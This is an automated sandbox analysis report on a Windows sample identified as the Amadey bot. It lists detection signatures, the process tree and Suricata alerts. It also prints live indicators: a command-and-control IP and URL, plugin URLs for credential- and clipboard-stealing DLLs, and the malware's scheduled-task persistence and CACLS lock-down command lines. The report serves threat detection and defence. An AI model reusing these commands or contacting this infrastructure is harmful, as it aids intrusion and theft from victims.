Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Week13.exe

Overview

General Information

Sample name:Week13.exe
Analysis ID:1561581
MD5:a1b8fa53a47b1991ee76a46ee8685b7d
SHA1:4002a9cffcde9f7f44633457457792564a63bf5d
SHA256:e472fd69b5a891059f44206124baf829cb7583890e2c8e288e311359a2249871
Infos:

Detection

Amadey
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Amadey bot
Yara detected Amadeys stealer DLL
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Creates an undocumented autostart registry key
Machine Learning detection for dropped file
Machine Learning detection for sample
Uses schtasks.exe or at.exe to add and modify task schedules
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Drops PE files
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Schtasks From Env Var Folder
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses cacls to modify the permissions of files

Classification

Process Tree

  • System is w10x64
  • Week13.exe (PID: 4712 cmdline: "C:\Users\user\Desktop\Week13.exe" MD5: A1B8FA53A47B1991EE76A46EE8685B7D)
    • oneetx.exe (PID: 6160 cmdline: "C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exe" MD5: A1B8FA53A47B1991EE76A46EE8685B7D)
      • schtasks.exe (PID: 6592 cmdline: "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN oneetx.exe /TR "C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exe" /F MD5: 48C2FE20575769DE916F48EF0676A965)
        • conhost.exe (PID: 1252 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 5024 cmdline: "C:\Windows\System32\cmd.exe" /k echo Y|CACLS "oneetx.exe" /P "user:N"&&CACLS "oneetx.exe" /P "user:R" /E&&echo Y|CACLS "..\cb7ae701b3" /P "user:N"&&CACLS "..\cb7ae701b3" /P "user:R" /E&&Exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 6620 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • cmd.exe (PID: 5332 cmdline: C:\Windows\system32\cmd.exe /S /D /c" echo Y" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • cacls.exe (PID: 2276 cmdline: CACLS "oneetx.exe" /P "user:N" MD5: 00BAAE10C69DAD58F169A3ED638D6C59)
        • cacls.exe (PID: 6584 cmdline: CACLS "oneetx.exe" /P "user:R" /E MD5: 00BAAE10C69DAD58F169A3ED638D6C59)
        • cmd.exe (PID: 5008 cmdline: C:\Windows\system32\cmd.exe /S /D /c" echo Y" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • cacls.exe (PID: 6628 cmdline: CACLS "..\cb7ae701b3" /P "user:N" MD5: 00BAAE10C69DAD58F169A3ED638D6C59)
        • cacls.exe (PID: 1120 cmdline: CACLS "..\cb7ae701b3" /P "user:R" /E MD5: 00BAAE10C69DAD58F169A3ED638D6C59)
  • oneetx.exe (PID: 3788 cmdline: C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exe MD5: A1B8FA53A47B1991EE76A46EE8685B7D)
  • oneetx.exe (PID: 5068 cmdline: C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exe MD5: A1B8FA53A47B1991EE76A46EE8685B7D)
  • oneetx.exe (PID: 4204 cmdline: C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exe MD5: A1B8FA53A47B1991EE76A46EE8685B7D)
  • oneetx.exe (PID: 5820 cmdline: C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exe MD5: A1B8FA53A47B1991EE76A46EE8685B7D)
  • oneetx.exe (PID: 6464 cmdline: C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exe MD5: A1B8FA53A47B1991EE76A46EE8685B7D)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
AmadeyAmadey is a botnet that appeared around October 2018 and is being sold for about $500 on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls to receive orders from it. Its main functionality is that it can load other payloads (called "tasks") for all or specifically targeted computers compromised by the malware.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.amadey

Malware Configuration

Threatname: Amadey

{"C2 url": "193.3.19.154/store/games/index.php", "Version": "3.80", "Install Folder": "cb7ae701b3", "Install File": "oneetx.exe"}

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
Week13.exeJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security

    PCAP (Network Traffic)

    SourceRuleDescriptionAuthorStrings
    dump.pcapJoeSecurity_AmadeyYara detected Amadey botJoe Security

      Dropped Files

      SourceRuleDescriptionAuthorStrings
      C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exeJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security

        Memory Dumps

        SourceRuleDescriptionAuthorStrings
        00000000.00000000.2018110902.0000000000611000.00000020.00000001.01000000.00000003.sdmpJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
          00000010.00000000.2659622976.0000000000891000.00000020.00000001.01000000.00000008.sdmpJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
            00000000.00000002.2024090733.0000000000611000.00000020.00000001.01000000.00000003.sdmpJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
              00000001.00000002.4482643286.0000000000D36000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_AmadeyYara detected Amadey botJoe Security
                00000011.00000000.3258747374.0000000000891000.00000020.00000001.01000000.00000008.sdmpJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
                  Click to see the 14 entries

                  Sigma Signatures

                  Sigma detected: Suspicious Add Scheduled Task Parent
                  Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN oneetx.exe /TR "C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exe" /F, CommandLine: "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN oneetx.exe /TR "C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exe" /F, CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exe, ParentProcessId: 6160, ParentProcessName: oneetx.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN oneetx.exe /TR "C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exe" /F, ProcessId: 6592, ProcessName: schtasks.exe
                  Sigma detected: Suspicious Schtasks From Env Var Folder
                  Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN oneetx.exe /TR "C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exe" /F, CommandLine: "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN oneetx.exe /TR "C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exe" /F, CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exe, ParentProcessId: 6160, ParentProcessName: oneetx.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN oneetx.exe /TR "C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exe" /F, ProcessId: 6592, ProcessName: schtasks.exe

                  Suricata Signatures

                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-11-23T20:52:56.688685+010020277001Malware Command and Control Activity Detected192.168.2.550036193.3.19.15480TCP
                  2024-11-23T20:53:04.143083+010020277001Malware Command and Control Activity Detected192.168.2.549705193.3.19.15480TCP
                  2024-11-23T20:53:08.382363+010020277001Malware Command and Control Activity Detected192.168.2.549706193.3.19.15480TCP
                  2024-11-23T20:53:12.626323+010020277001Malware Command and Control Activity Detected192.168.2.549707193.3.19.15480TCP
                  2024-11-23T20:53:16.860879+010020277001Malware Command and Control Activity Detected192.168.2.549709193.3.19.15480TCP
                  2024-11-23T20:53:21.095201+010020277001Malware Command and Control Activity Detected192.168.2.549712193.3.19.15480TCP
                  2024-11-23T20:53:25.313904+010020277001Malware Command and Control Activity Detected192.168.2.549722193.3.19.15480TCP
                  2024-11-23T20:53:29.579693+010020277001Malware Command and Control Activity Detected192.168.2.549733193.3.19.15480TCP
                  2024-11-23T20:53:33.829480+010020277001Malware Command and Control Activity Detected192.168.2.549741193.3.19.15480TCP
                  2024-11-23T20:53:38.073084+010020277001Malware Command and Control Activity Detected192.168.2.549752193.3.19.15480TCP
                  2024-11-23T20:53:42.313889+010020277001Malware Command and Control Activity Detected192.168.2.549764193.3.19.15480TCP
                  2024-11-23T20:53:46.532660+010020277001Malware Command and Control Activity Detected192.168.2.549775193.3.19.15480TCP
                  2024-11-23T20:53:50.782734+010020277001Malware Command and Control Activity Detected192.168.2.549787193.3.19.15480TCP
                  2024-11-23T20:53:55.042480+010020277001Malware Command and Control Activity Detected192.168.2.549794193.3.19.15480TCP
                  2024-11-23T20:53:59.298221+010020277001Malware Command and Control Activity Detected192.168.2.549804193.3.19.15480TCP
                  2024-11-23T20:54:03.548223+010020277001Malware Command and Control Activity Detected192.168.2.549815193.3.19.15480TCP
                  2024-11-23T20:54:07.798356+010020277001Malware Command and Control Activity Detected192.168.2.549826193.3.19.15480TCP
                  2024-11-23T20:54:12.048318+010020277001Malware Command and Control Activity Detected192.168.2.549837193.3.19.15480TCP
                  2024-11-23T20:54:16.282841+010020277001Malware Command and Control Activity Detected192.168.2.549848193.3.19.15480TCP
                  2024-11-23T20:54:20.533150+010020277001Malware Command and Control Activity Detected192.168.2.549859193.3.19.15480TCP
                  2024-11-23T20:54:24.851912+010020277001Malware Command and Control Activity Detected192.168.2.549867193.3.19.15480TCP
                  2024-11-23T20:54:29.157698+010020277001Malware Command and Control Activity Detected192.168.2.549878193.3.19.15480TCP
                  2024-11-23T20:54:33.560630+010020277001Malware Command and Control Activity Detected192.168.2.549887193.3.19.15480TCP
                  2024-11-23T20:54:37.814020+010020277001Malware Command and Control Activity Detected192.168.2.549898193.3.19.15480TCP
                  2024-11-23T20:54:42.064285+010020277001Malware Command and Control Activity Detected192.168.2.549909193.3.19.15480TCP
                  2024-11-23T20:54:46.314044+010020277001Malware Command and Control Activity Detected192.168.2.549920193.3.19.15480TCP
                  2024-11-23T20:54:50.563900+010020277001Malware Command and Control Activity Detected192.168.2.549930193.3.19.15480TCP
                  2024-11-23T20:54:54.816557+010020277001Malware Command and Control Activity Detected192.168.2.549940193.3.19.15480TCP
                  2024-11-23T20:54:57.550787+010020277001Malware Command and Control Activity Detected192.168.2.549950193.3.19.15480TCP
                  2024-11-23T20:55:01.782905+010020277001Malware Command and Control Activity Detected192.168.2.549958193.3.19.15480TCP
                  2024-11-23T20:55:06.032766+010020277001Malware Command and Control Activity Detected192.168.2.549967193.3.19.15480TCP
                  2024-11-23T20:55:10.291064+010020277001Malware Command and Control Activity Detected192.168.2.549976193.3.19.15480TCP
                  2024-11-23T20:55:14.517087+010020277001Malware Command and Control Activity Detected192.168.2.549987193.3.19.15480TCP
                  2024-11-23T20:55:18.770958+010020277001Malware Command and Control Activity Detected192.168.2.549998193.3.19.15480TCP
                  2024-11-23T20:55:23.026943+010020277001Malware Command and Control Activity Detected192.168.2.550009193.3.19.15480TCP
                  2024-11-23T20:55:27.284604+010020277001Malware Command and Control Activity Detected192.168.2.550016193.3.19.15480TCP
                  2024-11-23T20:55:31.534796+010020277001Malware Command and Control Activity Detected192.168.2.550017193.3.19.15480TCP
                  2024-11-23T20:55:35.782914+010020277001Malware Command and Control Activity Detected192.168.2.550018193.3.19.15480TCP
                  2024-11-23T20:55:40.001425+010020277001Malware Command and Control Activity Detected192.168.2.550019193.3.19.15480TCP
                  2024-11-23T20:55:44.236221+010020277001Malware Command and Control Activity Detected192.168.2.550020193.3.19.15480TCP
                  2024-11-23T20:55:48.526834+010020277001Malware Command and Control Activity Detected192.168.2.550021193.3.19.15480TCP
                  2024-11-23T20:55:52.784639+010020277001Malware Command and Control Activity Detected192.168.2.550022193.3.19.15480TCP
                  2024-11-23T20:55:57.136097+010020277001Malware Command and Control Activity Detected192.168.2.550023193.3.19.15480TCP
                  2024-11-23T20:56:01.438981+010020277001Malware Command and Control Activity Detected192.168.2.550024193.3.19.15480TCP
                  2024-11-23T20:56:05.680904+010020277001Malware Command and Control Activity Detected192.168.2.550025193.3.19.15480TCP
                  2024-11-23T20:56:09.923228+010020277001Malware Command and Control Activity Detected192.168.2.550026193.3.19.15480TCP
                  2024-11-23T20:56:14.164217+010020277001Malware Command and Control Activity Detected192.168.2.550027193.3.19.15480TCP
                  2024-11-23T20:56:18.455177+010020277001Malware Command and Control Activity Detected192.168.2.550028193.3.19.15480TCP
                  2024-11-23T20:56:22.706673+010020277001Malware Command and Control Activity Detected192.168.2.550029193.3.19.15480TCP
                  2024-11-23T20:56:26.956810+010020277001Malware Command and Control Activity Detected192.168.2.550030193.3.19.15480TCP
                  2024-11-23T20:56:31.204734+010020277001Malware Command and Control Activity Detected192.168.2.550031193.3.19.15480TCP
                  2024-11-23T20:56:35.454542+010020277001Malware Command and Control Activity Detected192.168.2.550032193.3.19.15480TCP
                  2024-11-23T20:56:39.694587+010020277001Malware Command and Control Activity Detected192.168.2.550033193.3.19.15480TCP
                  2024-11-23T20:56:43.907721+010020277001Malware Command and Control Activity Detected192.168.2.550034193.3.19.15480TCP
                  2024-11-23T20:56:48.157989+010020277001Malware Command and Control Activity Detected192.168.2.550035193.3.19.15480TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-11-23T20:52:56.688685+010020457511A Network Trojan was detected192.168.2.550036193.3.19.15480TCP
                  2024-11-23T20:53:04.143083+010020457511A Network Trojan was detected192.168.2.549705193.3.19.15480TCP
                  2024-11-23T20:53:08.382363+010020457511A Network Trojan was detected192.168.2.549706193.3.19.15480TCP
                  2024-11-23T20:53:12.626323+010020457511A Network Trojan was detected192.168.2.549707193.3.19.15480TCP
                  2024-11-23T20:53:16.860879+010020457511A Network Trojan was detected192.168.2.549709193.3.19.15480TCP
                  2024-11-23T20:53:21.095201+010020457511A Network Trojan was detected192.168.2.549712193.3.19.15480TCP
                  2024-11-23T20:53:25.313904+010020457511A Network Trojan was detected192.168.2.549722193.3.19.15480TCP
                  2024-11-23T20:53:29.579693+010020457511A Network Trojan was detected192.168.2.549733193.3.19.15480TCP
                  2024-11-23T20:53:33.829480+010020457511A Network Trojan was detected192.168.2.549741193.3.19.15480TCP
                  2024-11-23T20:53:38.073084+010020457511A Network Trojan was detected192.168.2.549752193.3.19.15480TCP
                  2024-11-23T20:53:42.313889+010020457511A Network Trojan was detected192.168.2.549764193.3.19.15480TCP
                  2024-11-23T20:53:46.532660+010020457511A Network Trojan was detected192.168.2.549775193.3.19.15480TCP
                  2024-11-23T20:53:50.782734+010020457511A Network Trojan was detected192.168.2.549787193.3.19.15480TCP
                  2024-11-23T20:53:55.042480+010020457511A Network Trojan was detected192.168.2.549794193.3.19.15480TCP
                  2024-11-23T20:53:59.298221+010020457511A Network Trojan was detected192.168.2.549804193.3.19.15480TCP
                  2024-11-23T20:54:03.548223+010020457511A Network Trojan was detected192.168.2.549815193.3.19.15480TCP
                  2024-11-23T20:54:07.798356+010020457511A Network Trojan was detected192.168.2.549826193.3.19.15480TCP
                  2024-11-23T20:54:12.048318+010020457511A Network Trojan was detected192.168.2.549837193.3.19.15480TCP
                  2024-11-23T20:54:16.282841+010020457511A Network Trojan was detected192.168.2.549848193.3.19.15480TCP
                  2024-11-23T20:54:20.533150+010020457511A Network Trojan was detected192.168.2.549859193.3.19.15480TCP
                  2024-11-23T20:54:24.851912+010020457511A Network Trojan was detected192.168.2.549867193.3.19.15480TCP
                  2024-11-23T20:54:29.157698+010020457511A Network Trojan was detected192.168.2.549878193.3.19.15480TCP
                  2024-11-23T20:54:33.560630+010020457511A Network Trojan was detected192.168.2.549887193.3.19.15480TCP
                  2024-11-23T20:54:37.814020+010020457511A Network Trojan was detected192.168.2.549898193.3.19.15480TCP
                  2024-11-23T20:54:42.064285+010020457511A Network Trojan was detected192.168.2.549909193.3.19.15480TCP
                  2024-11-23T20:54:46.314044+010020457511A Network Trojan was detected192.168.2.549920193.3.19.15480TCP
                  2024-11-23T20:54:50.563900+010020457511A Network Trojan was detected192.168.2.549930193.3.19.15480TCP
                  2024-11-23T20:54:54.816557+010020457511A Network Trojan was detected192.168.2.549940193.3.19.15480TCP
                  2024-11-23T20:54:57.550787+010020457511A Network Trojan was detected192.168.2.549950193.3.19.15480TCP
                  2024-11-23T20:55:01.782905+010020457511A Network Trojan was detected192.168.2.549958193.3.19.15480TCP
                  2024-11-23T20:55:06.032766+010020457511A Network Trojan was detected192.168.2.549967193.3.19.15480TCP
                  2024-11-23T20:55:10.291064+010020457511A Network Trojan was detected192.168.2.549976193.3.19.15480TCP
                  2024-11-23T20:55:14.517087+010020457511A Network Trojan was detected192.168.2.549987193.3.19.15480TCP
                  2024-11-23T20:55:18.770958+010020457511A Network Trojan was detected192.168.2.549998193.3.19.15480TCP
                  2024-11-23T20:55:23.026943+010020457511A Network Trojan was detected192.168.2.550009193.3.19.15480TCP
                  2024-11-23T20:55:27.284604+010020457511A Network Trojan was detected192.168.2.550016193.3.19.15480TCP
                  2024-11-23T20:55:31.534796+010020457511A Network Trojan was detected192.168.2.550017193.3.19.15480TCP
                  2024-11-23T20:55:35.782914+010020457511A Network Trojan was detected192.168.2.550018193.3.19.15480TCP
                  2024-11-23T20:55:40.001425+010020457511A Network Trojan was detected192.168.2.550019193.3.19.15480TCP
                  2024-11-23T20:55:44.236221+010020457511A Network Trojan was detected192.168.2.550020193.3.19.15480TCP
                  2024-11-23T20:55:48.526834+010020457511A Network Trojan was detected192.168.2.550021193.3.19.15480TCP
                  2024-11-23T20:55:52.784639+010020457511A Network Trojan was detected192.168.2.550022193.3.19.15480TCP
                  2024-11-23T20:55:57.136097+010020457511A Network Trojan was detected192.168.2.550023193.3.19.15480TCP
                  2024-11-23T20:56:01.438981+010020457511A Network Trojan was detected192.168.2.550024193.3.19.15480TCP
                  2024-11-23T20:56:05.680904+010020457511A Network Trojan was detected192.168.2.550025193.3.19.15480TCP
                  2024-11-23T20:56:09.923228+010020457511A Network Trojan was detected192.168.2.550026193.3.19.15480TCP
                  2024-11-23T20:56:14.164217+010020457511A Network Trojan was detected192.168.2.550027193.3.19.15480TCP
                  2024-11-23T20:56:18.455177+010020457511A Network Trojan was detected192.168.2.550028193.3.19.15480TCP
                  2024-11-23T20:56:22.706673+010020457511A Network Trojan was detected192.168.2.550029193.3.19.15480TCP
                  2024-11-23T20:56:26.956810+010020457511A Network Trojan was detected192.168.2.550030193.3.19.15480TCP
                  2024-11-23T20:56:31.204734+010020457511A Network Trojan was detected192.168.2.550031193.3.19.15480TCP
                  2024-11-23T20:56:35.454542+010020457511A Network Trojan was detected192.168.2.550032193.3.19.15480TCP
                  2024-11-23T20:56:39.694587+010020457511A Network Trojan was detected192.168.2.550033193.3.19.15480TCP
                  2024-11-23T20:56:43.907721+010020457511A Network Trojan was detected192.168.2.550034193.3.19.15480TCP
                  2024-11-23T20:56:48.157989+010020457511A Network Trojan was detected192.168.2.550035193.3.19.15480TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-11-23T20:53:04.143141+010028033053Unknown Traffic192.168.2.549704193.3.19.15480TCP
                  2024-11-23T20:53:12.626276+010028033053Unknown Traffic192.168.2.549708193.3.19.15480TCP
                  2024-11-23T20:53:21.095122+010028033053Unknown Traffic192.168.2.549714193.3.19.15480TCP
                  2024-11-23T20:53:29.579645+010028033053Unknown Traffic192.168.2.549735193.3.19.15480TCP
                  2024-11-23T20:53:38.073133+010028033053Unknown Traffic192.168.2.549754193.3.19.15480TCP
                  2024-11-23T20:53:46.532797+010028033053Unknown Traffic192.168.2.549776193.3.19.15480TCP

                  Joe Sandbox Signatures

                  Click to jump to signature section

                  Show All Signature Results

                  AV Detection

                  barindex
                  Antivirus / Scanner detection for submitted sample
                  Source: Week13.exeAvira: detected
                  Antivirus detection for URL or domain
                  Source: http://193.3.19.154/store/games/index.php1mb3JtLXVybGVuY29kZWQ=NAvira URL Cloud: Label: malware
                  Source: http://193.3.19.154/store/games/index.phpcAvira URL Cloud: Label: malware
                  Source: http://193.3.19.154/store/games/index.phpdAvira URL Cloud: Label: malware
                  Source: http://193.3.19.154/store/games/index.phppdRAvira URL Cloud: Label: malware
                  Source: http://193.3.19.154/store/games/index.phppdAvira URL Cloud: Label: malware
                  Source: http://193.3.19.154/store/games/index.phpe5a2ab05Avira URL Cloud: Label: malware
                  Source: http://193.3.19.154/store/games/index.phpAvira URL Cloud: Label: malware
                  Source: http://193.3.19.154/store/games/Plugins/cred64.dllxAvira URL Cloud: Label: malware
                  Source: http://193.3.19.154/store/games/Plugins/cred64.dllAvira URL Cloud: Label: malware
                  Source: http://193.3.19.154/store/games/index.php1mb3JtLXVybGVuY29kZWQ=Avira URL Cloud: Label: malware
                  Source: http://193.3.19.154/store/games/Plugins/clip64.dllYS2Avira URL Cloud: Label: malware
                  Source: http://193.3.19.154/store/games/index.phptAvira URL Cloud: Label: malware
                  Source: http://193.3.19.154/store/games/index.phpdedAvira URL Cloud: Label: malware
                  Source: http://193.3.19.154/store/games/Plugins/clip64.dllAvira URL Cloud: Label: malware
                  Antivirus detection for dropped file
                  Source: C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exeAvira: detection malicious, Label: HEUR/AGEN.1317762
                  Found malware configuration
                  Source: Week13.exeMalware Configuration Extractor: Amadey {"C2 url": "193.3.19.154/store/games/index.php", "Version": "3.80", "Install Folder": "cb7ae701b3", "Install File": "oneetx.exe"}
                  Multi AV Scanner detection for dropped file
                  Source: C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exeReversingLabs: Detection: 91%
                  Multi AV Scanner detection for submitted file
                  Source: Week13.exeReversingLabs: Detection: 91%
                  AI detected suspicious sample
                  Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                  Machine Learning detection for dropped file
                  Source: C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exeJoe Sandbox ML: detected
                  Machine Learning detection for sample
                  Source: Week13.exeJoe Sandbox ML: detected
                  Source: Week13.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                  Source: Week13.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                  Source: Binary string: D:\Mktmp\Amadey\Release\Amadey.pdb source: Week13.exe, oneetx.exe.0.dr

                  Networking

                  barindex
                  Suricata IDS alerts for network traffic
                  Source: Network trafficSuricata IDS: 2027700 - Severity 1 - ET MALWARE Amadey CnC Check-In : 192.168.2.5:49733 -> 193.3.19.154:80
                  Source: Network trafficSuricata IDS: 2027700 - Severity 1 - ET MALWARE Amadey CnC Check-In : 192.168.2.5:49712 -> 193.3.19.154:80
                  Source: Network trafficSuricata IDS: 2045751 - Severity 1 - ET MALWARE Win32/Amadey Bot Activity (POST) M2 : 192.168.2.5:49712 -> 193.3.19.154:80
                  Source: Network trafficSuricata IDS: 2045751 - Severity 1 - ET MALWARE Win32/Amadey Bot Activity (POST) M2 : 192.168.2.5:49733 -> 193.3.19.154:80
                  Source: Network trafficSuricata IDS: 2027700 - Severity 1 - ET MALWARE Amadey CnC Check-In : 192.168.2.5:49815 -> 193.3.19.154:80
                  Source: Network trafficSuricata IDS: 2045751 - Severity 1 - ET MALWARE Win32/Amadey Bot Activity (POST) M2 : 192.168.2.5:49815 -> 193.3.19.154:80
                  Source: Network trafficSuricata IDS: 2027700 - Severity 1 - ET MALWARE Amadey CnC Check-In : 192.168.2.5:49804 -> 193.3.19.154:80
                  Source: Network trafficSuricata IDS: 2027700 - Severity 1 - ET MALWARE Amadey CnC Check-In : 192.168.2.5:49764 -> 193.3.19.154:80
                  Source: Network trafficSuricata IDS: 2027700 - Severity 1 - ET MALWARE Amadey CnC Check-In : 192.168.2.5:49706 -> 193.3.19.154:80
                  Source: Network trafficSuricata IDS: 2045751 - Severity 1 - ET MALWARE Win32/Amadey Bot Activity (POST) M2 : 192.168.2.5:49706 -> 193.3.19.154:80
                  Source: Network trafficSuricata IDS: 2027700 - Severity 1 - ET MALWARE Amadey CnC Check-In : 192.168.2.5:49709 -> 193.3.19.154:80
                  Source: Network trafficSuricata IDS: 2045751 - Severity 1 - ET MALWARE Win32/Amadey Bot Activity (POST) M2 : 192.168.2.5:49709 -> 193.3.19.154:80
                  Source: Network trafficSuricata IDS: 2045751 - Severity 1 - ET MALWARE Win32/Amadey Bot Activity (POST) M2 : 192.168.2.5:49804 -> 193.3.19.154:80
                  Source: Network trafficSuricata IDS: 2027700 - Severity 1 - ET MALWARE Amadey CnC Check-In : 192.168.2.5:49787 -> 193.3.19.154:80
                  Source: Network trafficSuricata IDS: 2045751 - Severity 1 - ET MALWARE Win32/Amadey Bot Activity (POST) M2 : 192.168.2.5:49764 -> 193.3.19.154:80
                  Source: Network trafficSuricata IDS: 2045751 - Severity 1 - ET MALWARE Win32/Amadey Bot Activity (POST) M2 : 192.168.2.5:49787 -> 193.3.19.154:80
                  Source: Network trafficSuricata IDS: 2027700 - Severity 1 - ET MALWARE Amadey CnC Check-In : 192.168.2.5:49837 -> 193.3.19.154:80
                  Source: Network trafficSuricata IDS: 2027700 - Severity 1 - ET MALWARE Amadey CnC Check-In : 192.168.2.5:49705 -> 193.3.19.154:80
                  Source: Network trafficSuricata IDS: 2045751 - Severity 1 - ET MALWARE Win32/Amadey Bot Activity (POST) M2 : 192.168.2.5:49705 -> 193.3.19.154:80
                  Source: Network trafficSuricata IDS: 2027700 - Severity 1 - ET MALWARE Amadey CnC Check-In : 192.168.2.5:49707 -> 193.3.19.154:80
                  Source: Network trafficSuricata IDS: 2045751 - Severity 1 - ET MALWARE Win32/Amadey Bot Activity (POST) M2 : 192.168.2.5:49707 -> 193.3.19.154:80
                  Source: Network trafficSuricata IDS: 2045751 - Severity 1 - ET MALWARE Win32/Amadey Bot Activity (POST) M2 : 192.168.2.5:49837 -> 193.3.19.154:80
                  Source: Network trafficSuricata IDS: 2027700 - Severity 1 - ET MALWARE Amadey CnC Check-In : 192.168.2.5:49775 -> 193.3.19.154:80
                  Source: Network trafficSuricata IDS: 2027700 - Severity 1 - ET MALWARE Amadey CnC Check-In : 192.168.2.5:49867 -> 193.3.19.154:80
                  Source: Network trafficSuricata IDS: 2045751 - Severity 1 - ET MALWARE Win32/Amadey Bot Activity (POST) M2 : 192.168.2.5:49867 -> 193.3.19.154:80
                  Source: Network trafficSuricata IDS: 2045751 - Severity 1 - ET MALWARE Win32/Amadey Bot Activity (POST) M2 : 192.168.2.5:49775 -> 193.3.19.154:80
                  Source: Network trafficSuricata IDS: 2027700 - Severity 1 - ET MALWARE Amadey CnC Check-In : 192.168.2.5:49878 -> 193.3.19.154:80
                  Source: Network trafficSuricata IDS: 2027700 - Severity 1 - ET MALWARE Amadey CnC Check-In : 192.168.2.5:49859 -> 193.3.19.154:80
                  Source: Network trafficSuricata IDS: 2045751 - Severity 1 - ET MALWARE Win32/Amadey Bot Activity (POST) M2 : 192.168.2.5:49878 -> 193.3.19.154:80
                  Source: Network trafficSuricata IDS: 2027700 - Severity 1 - ET MALWARE Amadey CnC Check-In : 192.168.2.5:49848 -> 193.3.19.154:80
                  Source: Network trafficSuricata IDS: 2045751 - Severity 1 - ET MALWARE Win32/Amadey Bot Activity (POST) M2 : 192.168.2.5:49848 -> 193.3.19.154:80
                  Source: Network trafficSuricata IDS: 2027700 - Severity 1 - ET MALWARE Amadey CnC Check-In : 192.168.2.5:49741 -> 193.3.19.154:80
                  Source: Network trafficSuricata IDS: 2045751 - Severity 1 - ET MALWARE Win32/Amadey Bot Activity (POST) M2 : 192.168.2.5:49741 -> 193.3.19.154:80
                  Source: Network trafficSuricata IDS: 2027700 - Severity 1 - ET MALWARE Amadey CnC Check-In : 192.168.2.5:49930 -> 193.3.19.154:80
